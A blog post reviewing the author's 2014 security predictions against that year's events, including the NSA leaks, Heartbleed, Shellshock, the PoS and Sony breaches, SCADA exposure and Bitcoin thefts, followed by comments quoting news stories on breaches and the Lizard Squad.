Aftermath: Security trends 2014

My assumptations I made in Security trends 2014 posting is in italic font style.

There will still be NSA aftershocks after new material comes out and different parties react to them (and news sources write about them). U.S. cloud services have been put into question for good reason. There will be a lot of NSA spying litigation. Those spying issues will also fuel some haktivism (it has already started to happen).

This has pretty much happened. A good deal of folk aware of NSA leaker Edward Snowden have improved the security of their online activity after learning of his exploits, a large survey has found. Maybe Edward Snowden has been the best security educator ever because it seeems that Snowden Leaks Prompt Internet Users Worldwide To Protect Their Data: An international survey of Internet users has found that more than 39% have taken steps to protect their online privacy and security as a result of spying revelations by one-time NSA employee Edward Snowden (706 million people have changed their behavior on the Internet because of what the NSA and GCHQ are doing). Two-thirds (64%) of users indicated they are more concerned today about online privacy than they were a year ago.

The use of security tools like use of HTTPS and Tor network had increased. Today major players are embracing end-to-end encryption, so that about 50% of web traffic is carried by HTTPS. The increased use of HTTPS has made the life of IT departments harder, because normal firewalls can’s look what is inside encypted HTTPS packets.

The Tor Project, the world’s most popular anonymity network has continually resurfaced in the headlines, and not all of them have been positive. An international police bust of at least 17 hidden services like Silk Road 2.0 and Doxbin, is the only latest notch on the belt of law enforcement agencies that have been closely watching Tor users for years.

Malware attacks, especially in Europe, nearly doubled in the first half of 2014. Government, financial services, telecommunications and energy were the most targeted sectors – collectively making up more than half of attacks. The UK followed by Germany were the two European countries most commonly targeted by malware-flinging, spear-phishing cyberspies.

Details of some serious spying malwares have been come to public. Intelligence-gathering super spyware Regin has been gathering information from Windows computers for many years (bits and pieces of the malware have been spotted by Microsoft, Kaspersky Lab, F-Secure and Symantec over the years). I had very many targets. Reports indicate that Belgian telecom giant Belgacom was under continuous hack attack for more than two years: In its digital attack on Belgacom, the British secret service was able to intercept more communications than was previously realised (NATO and the EU, as well as from clients of hundreds of international telecoms providers). Regin further demonstrates that Western intelligence agencies are also involved in covert cyberespionage. But here’s a question no one’s answering: given this super-malware first popped up in 2008, why has everyone in the antivirus industry kept quiet about it until now? 

There has been so-called advanced persistent threat (APT) “Turla” disclosed in August. In addition to infecting Windows computers, it used also a powerful, highly stealthy Linux trojan may have infected victims for years. For at least four years, the campaign targeted government institutions, embassies, military, education, research, and pharmaceutical companies in more than 45 countries.

The use of hacking techniques and malware in state-sponsored espionage has been publicly documented over the last few years: China has been linked to extensive cyber espionage, and recently the Russian government was also alleged to have been behind a cyber attack on the White House. Regin further demonstrates that Western intelligence agencies are also involved in covert cyberespionage.

Internet core was in danger: Hackers Compromise ICANN Computers. A “spearfishing” attack aimed at US-based nonprofit Internet Corporation for Assigned Names and Numbers (ICANN) hooked staff members with emails. User names and passwords were used to access a Centralized Zone Data System, a repository that stores, among other things, data related to information needed to pair domain names with IP addresses and information on domain owners (including  hashed usernames and passwords).

The use of “fakemobile tower acting between the target mobile phone(s) and the service provider’s real towers have increased or their use has now surfaced. The IMSI catcher subjects the phones in its vicinity to a man-in-the-middle attack, acting to them as a preferred base station in terms of signal strength. US Police have Used Fake Mobile Base Stations to Spy on Citizens: A civil liberties group has discovered emails showing that the US government has concealed police use of fake mobile base stations which can spy on citizens without requiring search warrants since at least 2009. Many fake mobile phone stations were found in USA. There is an underground market for illegal telecoms equipment, much of which comes from China. Fake base stations were found on many other countries. There is market for tolls tha can detect fake base stations (for example CryptoPhone 500 which costs $3500 ). It seems that guests states have been spying mobile phones in Finland, Sweden and Norway with fake base stations.

Old teleecom core protocols have proven to be vulnerable. Researchers discovered security flaws in SS7 that allow listening to private phone calls and intercepting text messages on a potentially massive scale – even when cellular networks are using the most advanced encryption now available. Hackers can repurpose some normal functions for surveillance because of the lax security on the network: the housekeeping functions built into SS7 can locate callers anywhere in the world, listen to calls as they happen. This allows spies and criminals listen to private phone calls and intercept text messages on a potentially massive scale – even when cellular networks are using the most advanced encryption now available. But even as individual carriers harden their systems, they still must communicate with each other over SS7, leaving them open to any of thousands of companies worldwide with access to the network.

Security Professionals: Top Cyber Threat Predictions for 2014 article lists the following predictions that seem to pretty propable: Cybersecurity Regulatory Efforts Will Spark Greater Need for Harmonization, Service-Impacting Interruptions for Online Services Will Persist, We Will See an Increase in Cybercrime Activity Related to the World Cup, Rise of Regional Cloud Services, Dev-Ops Security Integration Fast Becoming Critical, Cybercrime that Leverages Unsupported Software will Increase, Increase in Social Engineering and Ransomware will Impact More People.

This list pretty much describes what happened in 2014. This was spot-on set of predictions.

Ubiquitous mobile computing is all around us, which will lead to increased risks and concerns about social network privacy. Social networks have quickly become the key organizing principle of Internet communication and collaboration.

Social networks are used more and more. There are privacy issues on social networks, but there are also secindary issues in wider uses of them. Nowdays there are many web sites that support social media logins. Hackers are atacking them for example with ‘SpoofedMe’ social login attack.

Android anti-virus apps CAN’T kill nasties on sight like normal AV.

Android malware has been on the news quite often. Traditional AV companies have had complaints that they can’t scan the whole device like they could do with PC. To combat with that, Google has made major security enhancements to Android 4.4 and Android 5.0. Android 5.0 also has a number of under-the-hood changes, including some major updates to the overall security of the platform. The biggest roadblock to mobile device security is actually user apathy, which sees people skipping basic security practices like implementing a lock screen pin code because it’s inconvenient when you’re checking your device every few minutes. There are usability improvements that hopefully help.

2013 was a very hacked year when there was many cases where information on millions or tens of millions of users were stolen from companies. It’s likely that we will see much more of the same in 2014, the way people use passwords and how the on-line services are built have not changed much in one year.

To me seems that year 2014 was much worse than 2013. There has been lots of hacking incidents and some of the basic building blocks of our IT world have been seriously hacked.

USB security is fundamenally broken: Consider all USB devices potentially dangerous. Attack BadUSB shows that USB controllers in very many USB devices can be reprogrammed to bake the device become attack devices. It is practically impossible to know if any unit could be reprogrammed to own computers. Once infected through USB, malware can use peripherals as a hiding place, hindering system clean up. As long as USB controllers are reprogrammable, USB peripherals should not be shared with others. There are no easy or quick fixes to this serious problem. Malicious firmware could easily spoof its legitimacy to foil malware scans. A little USB device can hack your computer in no time flat without you knowing about it. It’s a classic scene from basically every spy movie in history. In this case, however, that mystery device is real. It is pretty easy to make a device that pretends to be a keyboard/mouse or does even nastier things.That’s… kind of terrifying.  So what can you do to protect yourself from things like this? Not a whole lot, really — that’s why attacks like this and BadUSB are so freaky.

This was a year of well branded vulnerabilities: In year so14 was the year when found security vulnerabilities started to be tranded with catchy names, logos and web sited.

Open source security was hit very baddly with Heartbleed and Shellshock. The Heartbleed bug allowsed anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This was a very severe two-year-old security hole right in the core of the Internet security – HTTPS protocol. Heartbleed affected most web servers, email servers, chat servers, virtual private networks (SSL VPNs), network appliances, wide variety of client side software, mobile apps and Internet-connected embedded devices.

Later in the year HTTPS was hit again with POODLE bug that bypasses TLS crypto. It hit around 10 percent of websites - some of the Internet’s top websites. POODLE attack rendered the already old SSL 3.0 encryption useless and support for being phases out on web browsers and servers.

CVE-2014-6271 is also known as “Shellshock”  or Shell Shocked bash bug has been around for a long, long time (around 20 years). The vulnerability affects versions 1.14 through 4.3 of GNU Bash. That means there are lots of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won’t be, is much larger than Heartbleed. It’s things like CGI scripts that are vulnerable, deep within a website. This was not only Linux problem. This problem could allow attackers to execute code on Linux, Unix, and Mac OS X.

Windows security was also hit: Sandworm security issue will trigger the UAC (User Account Control) on Windows . Windows had also it’s own Shellshock style security issue – Microsoft fixes severe 19-year-old Windows bug found in everything since Windows 95. The vulnerability (CVE-2014-6332) rated a critical score of 9.3 in all versions of Windows and was described as a rare “unicorn-like” bug in Internet Explorer-dependent code that opens avenues for man in the middle attacks. A separate critical hole (MS14-066) affecting Microsoft’s Secure Channel (SChannel) that implemented Secure Sockets Layer and Transport Layer Security protocols was also patched: if an attacker modified packets in a particular way and attacked your machine, they may be able to execute whatever code they like remotely without an authorized an account.

Misfortune Cookie is a critical vulnerability that allows an intruder to remotely take over an Internet router and use it to attack home and business networks. Researchers have distinctly detected approximately 12 million readily exploitable unique devices connected to the Internet present in 189 countries across the globe, making this one of the most widespread vulnerabilities revealed in recent years. All an attacker needs in order to exploit Misfortune Cookie is to send a single packet to your public IP address (a simple modern browser can do that). Misfortune Cookie affects any implementation of a service using the old version of RomPager’s HTTP parsing code, on port 80, 8080, 443, 7547, and others (devices managed by TR-069 or web browser). The vulnerability allows attacker to take over device setting and turn off all firewall seting (=WAN-to-LAN free-crossing that makes possible that attacker can try to access your home webcam or extract data from your business NAS backup drive, both potentially using default credentials and/or have their own vulnerabilities). This should be considered an alarming wake-up call for the embedded device industry and consumers alike: The vulnerable code is from 2002 and was actually fixed in 2005 and yet still did not make it into consumer devices. Watch for firmware updates from your device vendor addressing Misfortune Cookie, apply the update as it is released. Remember that your router’s security should be just one layer in your multi-layer network security defenses.

Large scale privacy scandals:

Celebrity photo leak 2014 generated many headlines. Beginning August 31, 2014, a collection of almost 500 private pictures of various celebrities (photos and videos of more than 100 individuals including 26 celebrities), mostly women, and with many containing nudity, were posted on the imageboard 4chan, and later disseminated by other users on websites and social networks. The images were believed to have been obtained via a breach of Apple‘s cloud services suite iCloud using using a “very targeted attack” on account information.

 

Russian hacked webcam scandal: Too many people are leaving their internet-connected webcams (CCTV cameras and baby monitors) wide open to abuse. A Russian website insecam.cc accessed the cams using the default login credentials, which are freely available online for thousands of devices. Insecam offered tens of thousands of feeds from IP cameras all over the world for some time before the anonymous programmer shut down the website. Whether or not it violates any security and privacy laws has been a matter of some debate. Everyone should make sure they’ve changed their passwords on the devices from the factory defaults, which scumbags are exploiting to spy on victims from afar. It is very important to educate consumers that changing default passwords is extremely important to protect themselves from unwanted intruders.

Attacks against banking and businesses:

Financial security problems in USA were touching every other household: Some 45% of Americans say they or a household member have been notified by a credit card company, financial institution or retailer that their credit card information had possibly been stolen as part of a data breach.

The huge cyberattack on JPMorgan Chase that touched more than 83 million households and businesses was one of the most serious computer intrusions into an American corporation.

Almost 100 million credit card details were revealed on a series of serious retailer breaches (Target, Home Depot, Neiman Marcus etc.). Organized crime groups are actively distributing malicious code and compromising networking environments of merchants and credit card devices. A growing list of POS variants (POSCLOUD, Nemanja, JackPOS, BlackPOS, and Decebal) is being developed by underground cyber criminals because of the high ROI when they hit payloads like a Target or Home Depot. As more and more breach reports have come up constantly, consumers officially are starting to get breach fatigue, fraud shop OVERSTOCKED with stolen credit cards and banks are bringing breached companies to court to pay for damages caused to them.

It seems like year 2014 has almost been “The Year of PoS Breaches.”  Can We Learn from Big Breaches? At least companies will also face more stringent regulations: The new Payment Card Industry Data Security Standard 3.0 (PCI 3.0) will be mandatory for all businesses that store, process or transmit payment card information beginning 1 January 2015. The revamped standard includes requirements aimed at third party providers. The changes follow a string of high profile breaches.

There has been a long history of security companies hyping up remote threats in press releases. Then came the big corporate hit as bad as it can get: The Sony Pictures Hack Was Even Worse Than Everyone Thought. One of the biggest Hollywood studios and TV production companies was hit very seriously. Sony employees face ‘weeks of pen and paper’ after crippling network hack: The infiltration by hackers has left Sony employees “sitting at their desks trying to do their job with a pen and paper”.  It could take three weeks to clean up the mess and get things get back to normal. Lot of data was leaked out, including unreleased movies uploaded to pirate sited, contract details posted on-line, password-lists posted on-line, and everything from medical records to unreleased scripts. A recent report from the consulting firm PricewaterhouseCoopers estimated that more than 117,000 cyberattacks hit businesses each day, but few are on the scale of the blow dealt to Sony “It’s obvious from the scope of what’s been done that the intruders owned the entire environment”. Sony that has seen gigabytes of information leaked onto the internet (for example sensitive information and unreleased movies).

The Sony hack is different from most past hacks on this scale because the people who got the information don’t seem to be out for personal gain. Instead, they’re actively trying to embarrass and perhaps even destroy the company. The motives of sophisticated hackers have changed from self-gain to destruction. There have been estimates that Sony could suffer a loss of more than $100 million — and that was before a couple of former employees sued the company. The incident has caused the Sony Pictures to cancel the release of The Inteview movie. There has been question going on in USA could this kind of cyber-attack to be considered to be act of war?

This was not the only one attack that tried to damage company. Now at the Sands Casino: An Iranian Hacker in Every Server article tells how computer engineers at Las Vegas Sands Corp. (LVS) raced to figure out what was happening when it was under a withering cyber attack. PCs and servers were shutting down in a cascading IT catastrophe, with many of their hard drives wiped clean.  the $14 billion operation had sputtered to a halt. This was no Ocean’s Eleven. The hackers were not trying to empty a vault of cash, nor were they after customer credit card data. This was personal. The perpetrators wanted to punish the company, or, more precisely, its chief executive officer and majority owner, the billionaire Sheldon Adelson. This happened some moths before Sony event. This was likelythe first time that a foreign player simply sought to destroy American corporate infrastructure on such a scale.

 

There was plans to disturb computer gaming companies. How A Hacker Gang Literally Saved Christmas For Video Game Players Everywhere artcle tells that at the start of December, a notorious hacker gang named “Lizard Squad” issued a threat: it would take down over Christmas the PlayStation and Xbox Live networks, the online services that some video games need in order run from a home console. Lizard Squad is one of the most well-known online hacker groups and has a history of attacking popular video game services – latest taking the PlayStation and Xbox networks offline in Decmber. A group known as “The Finest Squad” emerged in December with the intention of bringing “cyber-criminals to justice” – managed to break into the public Twitter accounts and websites of Lizard Squad’s members, releasing their names and photographs of them online.

Gartner predicts that through 2014, improved JavaScript performance will begin to push HTML5 and the browser as a mainstream enterprise application development environment. I expect that HTML5 related security issues are increased due the fact that the technology being used more in 2014.

HTML5 was really pushed to mainstream. It is used visibly on many applications and also very much on the bacground in very many mobile apps. The use of HTML5 has increased, but it has not seem to be turned as a major security problem. So the secrity situation on HTML5 seems to be better than what I expected.

Over 50% of net traffic to web sited made by bots! More Than Half of Internet Traffic Is Just Bots article says that security and cloud service provider Incapsula analyzed and found out that more than 60 percent of internet traffic is computer generated, compared to less than 40 percent of traffic that is driven by human clicks. 31% of Bots Are Still Malicious. SEO link building has always a major motivation for automated link spamming, but it is decreasing due the fact that Google was able to discourage it. There are more advanced hacking and automatic vulnerability searching.

DDoS attacks are evolving from volumetric Layer 3-4 attacks to much more sophisticated and dangerous Layer 7 multi-vector threats.

There has been a series of dangerous atack vectors and very large volumetric DDoS attacks over the year 2014. DNS amplification attacks and NTP amplification attacks became popular. There were huge attacks that peaked over 400Gbps.

There will be still many SCADA security issues in 2014. Even though traditional SCADA vulnerabilities have become easier to find, the increased connectivity brought with IoT will cause new issues. And there will still be very many controls systems openly accessible from the Internet for practically everybody who knows how to do that. There was a large number of SCADA systems found open in Internet in the beginning of 2013, and the numbers have not considerably dropped during the year. I expect that very many of those systems are still too open in the end of 2014.

Large number of SCADA systems vulnerabilities and open systemd were found in 2014. Many SCADA systems are still too open – it seems that much of the world’s factories and critical infrastructure aren’t properly protected against hackers. Researchers have found vulnerabilities in industrial control systems that they say grant full control of systems running energy, chemical and transportation systems. Over 60,000 exposed control systems were found online.

Industrial systems are gaining the attention of not only security researchers, but also potential attackers. Data obtained from the Open-Source Vulnerability Database (OSVDB) shows that 80% of all ICS vulnerabilities have been disclosed since 2011. Hackers exploit SCADA holes to take full control of critical infrastructure.

Finnish security research firm F-Secure reported on a cyber campaign targeting industrial sectors and the suppliers of equipment to these sectors, including many in critical infrastructure. Late December a German steel factory suffered significant damage after attackers gained unauthorized access to computerized systems that help control its blast furnace – one of the plant’s blast furnaces could not be shut down in a controlled manner, which resulted in “massive damage to plant”. The incident is notable because it’s one of the few computer intrusions to cause physical damage.

There came also new details on some earlier damaging incidents that they could be result of cyber-attacks. The Stuxnet worm that targeted Iran’s uranium enrichment program has been dubbed the world’s first digital weapon, destroying an estimated 1,000 centrifuges. Bloomberg News reported that a fiery blast in 2008 that hit a Turkish oil pipeline was the result of hacking. The suspected sabotage of a Siberian pipeline in 1982 is believed to have used a logic bomb.

The Internet is expanding into enterprise assets and consumer items such as cars and televisions. The Internet of Things (IoT) will evolve into the Web of Things, increasing the coordination between things in the real world and their counterparts on the Web. There will be many security issues to solve and as the system become more widely used more security issues on them will be found in them.

Internet of Things was expanding very rapidly in 2014. The focus was on gettings the things running. Many of the applications were so new that there has not been any very big scale wide issues yet. I expect the IoT security issues become more to spotlight in 2015.

Cloud security will be talked about. Hopefully there will be some clear-up on the terminology on that area, because cloud security can mean a lot of things like the term cloud computing. Research firm Gartner forecasts that cloud security sales will increase dramatically in the next few years. Cloud Security sales have increased over the past year by 2.1 billion to $ 3.1 billion in 2015.

Let’s see nex year how the nunber add up.

Marketers try to put “cloud” term to security product brochures as much as they can. Cloud made ​​from the traditional information security sound old-fashioned because companies are under pressure to move services to the cloud. Also, mobile devices and information security dispersed users to set new standards.

Yes. Securiyt marketers used cloud security term a lot in their material.

In Finland a new Cyber Security Center started in the beginning of 2014. Security articles and warnings from it will be published at kyberturvallisuuskeskus.fi.

Cyber Security Center performed it’s tasks om 2014.

Crypto-currencies like Bitcoin and similar are on the rise. Early adopters already use them already actively. Those crypto-currencies have many security related issues related to them. The values of the crypto-currencies vary quite much, and easily the value drops considerably when they get so used that different governments try to limit using them. Bitcoin is increasingly used as ramsonware payment method. Bitcoins have been stolen lately quite much (and I expect that to increase when usage increases), and those are stolen from users, on-line wallets and from exchanges. When more money is involved, more bad guys try to get into to get some of it.

Year 2014 was a huge year for Bitcoin in good an bad. The alternative currency has been plagued by hacks, ponzi schemes and increasingly professional thefts since 2011, but yea 2014 was really special. There were many gains to the wider use of Bitcoins, even up to state that  Microsoft has quietly added Bitcoin as a payment method for digital content.

On the other side there were also many cyberatacks that stole lots of Bitcoins and Bitcoins were used by ransoware makers. In February 2014 world’s leading Bitcoin exchange mt Gox  declared bankrutpcy, claiming that hackers had exploited a technical issue called “transaction malleability” to steal 750,000 bitcoins ($400 million). It is hard to say if that’s what really happened or not. Next moth Flexcoin, the Canada-based Bitcoin bank, is to close after losing $600,000 in a hacker attack. Also other crytocurrencies were atacked by hackers, for example Hackers Steal $1.65 Million in NXT from BTER Exchange.

InNovember the Bitcoin Foundation says that Bitcoin is GREAT and SAFE. Bitcoin will have its biggest impact in unstable regimes and foreign currency transfers, according to the Bitcoin Foundation’s chief scientist Gavin Andresen. The Foundation works on keeping transaction fees inexpensive. Besides Bitcoin there are also many other smaller cyptocurrencies.

The world is looking for a virtual currency. Virtual means that the currency is not backed by a physical commodity, is not controlled by a government agency either, and is used and accepted among members of a specific virtual community (that is, the Internet). Today, enthusiasts of virtual currencies fall into two camps.

The first camp contains the crypto-currency enthusiasts, which have had lots of publicity on their idea: There are now 80 virtual currencies—all based off of Bitcoin—with names like Dogecoin, Altcoin, and Primecoin. Of these, Bitcoin has the vast majority of mindshare and user base (users at less than 1 million).

The second camp of virtual currency enthusiasts is largely unknown, which is surprising considering that there are over 30 million of them - just ordinary people in Africa using an SMS text-based currency called M-Pesa. The forward drivers for Bitcoin and M-Pesa are completely different. The M-Pesa phenomenon is a product of a unique regulatory environment. Creating a flexible, but safe regulatory space made the difference in Kenya and Tanzania. Kenya has become the paragon of mobile money. Today, more than two-thirds of Kenyans use M-Pesa. Mobile money has lagged in India and Nigeria, both of which are known for their more complex bureaucracies. Clearly the message here is that mobile money is a long game and most bitcoin startups accept this applies to them too. Research shows that there is clear demand for faster, cheaper, and more transparent financial services.

 

23 Comments

  1. Tomi Engdahl says:

    List of cyber attacks and data breaches in 2014
    http://www.itgovernance.co.uk/blog/list-of-the-hacks-and-breaches-in-2014/?utm_source=social&utm_medium=reddit

    look back on some of the more prominent hacks and data breaches of 2014

    Reply
  2. Tomi Engdahl says:

    Three things that we should be satisfied with:

    1. Finnish is still regarded as a safe country with a pure natural addition to pure communication networks and workstations, as well as provide a secure data centers of the soil in many ways.

    2. The cyber criminals have not struck our bank or payment systems in the same way in Finland, especially compared to the United States! Sure, the news must regularly read a variety of accessories for both banking and payment machines are abused and scam campaigns for on-line banking user information, and other information point, but we have learned in this regard to work safely.

    3. Mobile World staying fairly clean. Although the Android ecosystem, especially the rampant number of malware families, the mobile terminal has been able to maintain a moderately reliable.

    Source: http://www.tivi.fi/blogit/turvasatama/tietoturvakatsaus+2014++huonolta+nayttaa/a1038564

    Reply
  3. Tomi Engdahl says:

    Ideology Vs Reality
    Some people say that I’m just being an idealist and am disconnected from the realities of the world with this discussion. That in the “real” world there are tradeoffs that need to be made. That in the “real” world it’s not a black-and-white discussion.

    Well, let’s look at this “real” world:

    Sony – Seemingly all data on network leaked. Including social security numbers of 47,000 employees.
    Ebay – 145 million records leaked.
    Target – 40 million credit card numbers leaked. 70 million contact details.
    Home Depot – 56 million credit card numbers leaked. 53 million email addresses.
    Goodwill Industries – 868,000 credit card numbers
    JP Morgan – 7 million contact details
    Neiman Marcus – 350,000 credit card numbers
    Michaels – 2.6 million credit card numbers.

    And that’s just the big ones for 2014 so far.

    It’s been reported that there were 761 major breaches in 2014 alone. Exposing well over 83 million records (only counting confirmed records, not including unconfirmed numbers like Ebay). And those are just the major ones.

    That doesn’t touch the 100,000+ WordPress sites breached in November. Or the millions of sites hit by the Drupal SQL vulnerability.

    The reality is quite grim. Perhaps if others were a bit more “idealist”, this world would be a lot safer.

    Source: http://blog.ircmaxell.com/2014/12/being-responsible-developer.html

    Reply
  4. Tomi Engdahl says:

    Jon Southurst / CoinDesk:
    Japanese police suspect 99% of bitcoins missing from Mt. Gox are due to internal system manipulation, not hack

    Missing Mt Gox Bitcoins Likely an Inside Job, Say Japanese Police
    http://www.coindesk.com/missing-mt-gox-bitcoins-inside-job-japanese-police/

    Blame for 99% of the bitcoins missing from Mt Gox falls on internal system manipulation and not any external attack, a major Japanese newspaper has claimed.

    Citing an unnamed source connected to the ongoing police investigation, Japan’s Yomiuri Shimbun newspaper led with the story on the front page of its new year’s day edition. It said that only 7000 BTC, or 1% of the total 650,000 missing, could be attributed to hacking attacks from outside the company.

    That a company insider might have been responsible for the theft of 650,000 BTC from Mt Gox has been whispered about for some time, though no-one in particular has been named as a suspect, even unofficially.

    Mt Gox had no full-time staff other than CEO Mark Karpeles, employing a series of contractors on temporary work arrangements.

    Reply
  5. Tomi Engdahl says:

    Hackers ‘leak details of 13k users of PlayStation, Xbox and Amazon’
    http://www.telegraph.co.uk/news/worldnews/11314805/Hackers-leak-details-of-13k-users-of-PlayStation-Xbox-and-Amazon.html

    Hackers who say they are affiliated to Anonymous, the shadowy anarchist hacking collective, release document ‘containing passwords and credit card numbers’

    A gang of internet hackers claims it has leaked personal details of more than 13,000 users of PlayStation, Xbox and sites including Amazon in what appears to be the latest high-profile breach of internet security in recent weeks.

    The hackers – who say they are affiliated to Anonymous, the shadowy anarchist hacking collective – released a document containing username and password combinations, with credit card numbers and expiry dates added later.

    Microsoft’s Xbox games console, Sony’s PlayStation equivalent, and online gaming site Twitch.tv were among the main targets of the hack, the Dailydot.com website reported. Other reported targets include Walmart, the US supermarket giant, Amazon, Dell, computer games including The Sims 3 and Dragon Age: Origins and a host of porn sites.

    Reply
  6. Tomi Engdahl says:

    Lizard Kids: A Long Trail of Fail
    http://krebsonsecurity.com/2014/12/lizard-kids-a-long-trail-of-fail/

    The Lizard Squad, a band of young hooligans that recently became Internet famous for launching crippling distributed denial-of-service (DDoS) attacks against the largest online gaming networks, is now advertising its own Lizard-branded DDoS-for-hire service. Read on for a decidedly different take on this offering than what’s being portrayed in the mainstream media.

    The new service, lizardstresser[dot]su, seems a natural evolution for a group of misguided youngsters that has sought to profit from its attention-seeking activities.

    The Lizard kids only ceased their attack against Sony’s Playstation and Microsoft’s Xbox Live networks last week after MegaUpload founder Kim Dotcom offered the group $300,000 worth of vouchers for his service in exchange for ending the assault.

    The group is advertising the new “booter service” via its Twitter account, which has some 132,000+ followers. Subscriptions range from $5.99 per month for the ability to knock a target offline for 100 seconds at a time, to $129.99 monthly for DDoS attacks lasting more than eight hours.

    In a show of just how little this group knows about actual hacking and coding, the source code for the service appears to have been lifted in its entirety from titaniumstresser, another, more established DDoS-for-hire booter service.

    These two services, like most booters, are hidden behind CloudFlare, a content distribution service that lets sites obscure their true Internet address.

    LizardSquad and Darkode are practically synonymous and indistinguishable now.

    It’s worth noting that the individual who registered LizardStresser is an interesting and angry teenager who appears to hail from Australia

    Reply
  7. Tomi Engdahl says:

    Lizard Squad Member Vinnie Omari Arrested After Christmas DDoS Attacks
    Is the whole house collapsing?
    http://www.craveonline.com/gaming/articles/805559-lizard-squad-member-vinnie-omari-arrested-christmas-ddos-attacks

    A 22-year old male that goes by the alias ‘Twickenham’ has just been arrested following a raid on his home in Thames Valley, U.K. Officials claim that he had been stealing funds from PayPal accounts for more than a year.

    What makes this arrest particularly interesting is that the name of the arrested individual lines up with one of the names listed on KrebsOnSecurity‘s report including members of the DDoS group Lizard Squad.

    Previously, no members of Lizard Squad have been arrested. However, the FBI has confirmed its investigation of the group after costly attacks during the week of Christmas that rendered Xbox Live and PlayStation Network nearly inoperable during the most important days of the year.

    Who’s in the Lizard Squad?
    http://krebsonsecurity.com/2014/12/whos-in-the-lizard-squad/

    Member2, the guy that does most of the talking in the BBC interview, appears to be a 22-year-old from the United Kingdom named Vinnie Omari. Sky News ran an on-camera interview with Omari on Dec. 27, quoting him as a “computer security analyst” as he talks about the attacks by LizardSquad and their supposed feud with a rival hacker gang.

    Sources say Kivimäki was arrested by Helsinki police in October 2013 on suspicion of running a huge botnet consisting of more than 60,000 hacked Web servers around the world. Local Finnish media reported on the youth’s arrest, although they didn’t name him. Kivimäki, 16, also was reportedly found in possession of more than 3,000 stolen credit cards.

    Reply
  8. Tomi Engdahl says:

    That Spiegel NSA story is activist nonsense
    http://blog.erratasec.com/2014/12/that-spiegel-nsa-story-is-nonsense.html#.VKaEe3t3B-s

    Yet again activists demonstrate they are less honest than the NSA. Today, Der Spiegel has released more documents about the NSA. They largely confirm that the NSA is actually doing, in real-world situations, what we’ved suspected they can do. The text of the article describing these documents, however, wildly distorts what the documents show. A specific example is a discussion of something call “TUNDRA”.

    TUNDRA was a undergraduate student project, as the original document makes clear, not some super-secret government program into cryptography. The purpose of the program is to fund students and find recruits, not to create major new advances in cryptography.

    The Spiegel article correctly says that the “agency is actively looking for ways to break the very standard it recommends”, and it’s obvious from context that that the Spiegel is implying this is a bad thing. But it’s a good thing, as part of the effort in improving encryption. You secure things by trying to break them. That’s why this student project was funded by the IAD side of the NSA — the side dedicated to improving cryptography. Most of us in the cybersecurity industry are trying to break things — we only trust things that we’ve tried to break but couldn’t.

    The Spiegel document talks about AES, but it’s not AES being attacked. Instead, it’s all block ciphers in “electronic codebook” modes that are being attacked. The NSA, like all cryptographers, recommends that you don’t use the basic “electronic codebook” mode, because it reveals information about the encrypted data

    The NSA already has ways of attacking ECB mode

    Journalism is supposed to be different from activism. Journalists are supposed to be accurate and fair, to communicate rather than convince. The activist has the oppose goal, to convince the reader, even if that means exploiting misinformation.

    Reply
  9. Tomi Engdahl says:

    Ask a nerd
    http://blog.erratasec.com/2014/12/ask-nerd.html#.VKaF0Ht3B-s

    One should probably consult a lawyer on legal questions. Likewise, lawyers should probably consult nerds on technical questions. I point this out because of this crappy Lawfare post. It’s on the right side of the debate (FBI’s evidence pointing to North Korea is bad), but it’s still crap.

    For example, it says: “One hears a lot in cybersecurity circles that the government has “solved” the attribution problem”. That’s not true, you hear the opposite among cybersecurity experts. I suspect he gets this wrong because he’s not talking about technical experts, but government circles. What government types in Washington D.C. say about cybersecurity is wholly divorced from reality — you really ought to consult technical people.

    Reply
  10. Tomi Engdahl says:

    The FBI’s North Korea evidence is nonsense
    http://blog.erratasec.com/2014/12/the-fbis-north-korea-evidence-is.html#.VKaGInt3B-s

    The FBI has posted a press release describing why they think it’s North Korea. While there may be more things we don’t know, on its face it’s complete nonsense. It sounds like they’ve decided on a conclusion and are trying to make the evidence fit. They don’t use straight forward language, but confusing weasel words, like saying “North Korea actors” instead of simply “North Korea”. They don’t give details.

    The reason it’s nonsense is that the hacker underground shares code. They share everything: tools, techniques, exploits, owned-systems, botnets, and infrastructure. Different groups even share members. It is implausible that North Korea would develop it’s own malware from scratch.

    Update on Sony Investigation
    http://www.fbi.gov/news/pressrel/press-releases/update-on-sony-investigation

    Reply
  11. Tomi Engdahl says:

    Top Cybersecurity Headlines of 2014
    http://www.securityweek.com/top-cybersecurity-headlines-2014

    1) Point-of-sale (PoS) security
    2) Heartbleed Vulnerability
    3) Shellshock:
    4) Target Breach Fallout
    5) Sony

    Reply
  12. Tomi Engdahl says:

    Emily Yoshida / The Verge:
    In a future fueled by hacks and leaks, will we be sedated by our own transparency?

    Nothing to see here
    http://www.theverge.com/2014/12/31/7475193/hack-leak-transparency-outrage-thinkpiece-hot-take-economy-2014

    In a future fueled by hacks and leaks, will we be sedated by our own transparency?

    The word “unprecedented” was used a lot, whether to describe the case of surveillance footage of Ray Rice knocking out his then-fiancée, or this summer’s celebrity nude photo leak, or the hydra-headed nightmare of the Sony debacle. That continually acknowledged unknown territory should be a signal to us that we are in the middle of a period of rapid growth — or decay, depending on your point of view. The things we weren’t supposed to see grossly violated our commonly accepted standards for individual privacy; they also galvanized us and fueled conversations that may have otherwise been swept under the rug.

    Increasingly the story is not that a hack or leak happened, but rather what information was leaked and who stands to be hurt / ridiculed / financially affected by it. The Sony hacks happened in the middle of a veritable wave of cybersecurity fails — the US Postal Service, the Sands Casino, and Madonna were all subject to some kind of breach in 2014. Some of these stories were drowned out by the total news cycle domination of the Sony leak, but we have also become increasingly comfortable with the idea that these things happen. In the popular narrative, security breaches are being talked about less and less as crimes and more and more like inevitable glitches in our infinite series of tubes. Hacks are now just one of the many ways we get information: sometimes a tube breaks and candy starts falling out for a few seconds for whoever happens to be nearby. We’re starting to expect this as a natural part of life on Earth; like thunderstorms or earthquakes.

    On some level, we suspect we are moving towards a future where we can see inside every window all the time; a future where everyone’s medical records are publicly available, where we know what everyone looks like naked, whether they’re famous or not. But how will we expect ourselves and others to behave in that future, especially once we get used to it? Our actions and words, in tandem with the way we monitor them, are being held to a rapidly evolving standard. We’ll know more about what our neighbors do in private — sexual proclivities, how we choose to entertain ourselves — but it will take a lot more to shock us. There is a potentially utopian bent to all this: once everything is known, maybe everything will be accepted. The erosion of the individual’s private life could be a symptom of a more tolerant, open-minded society.

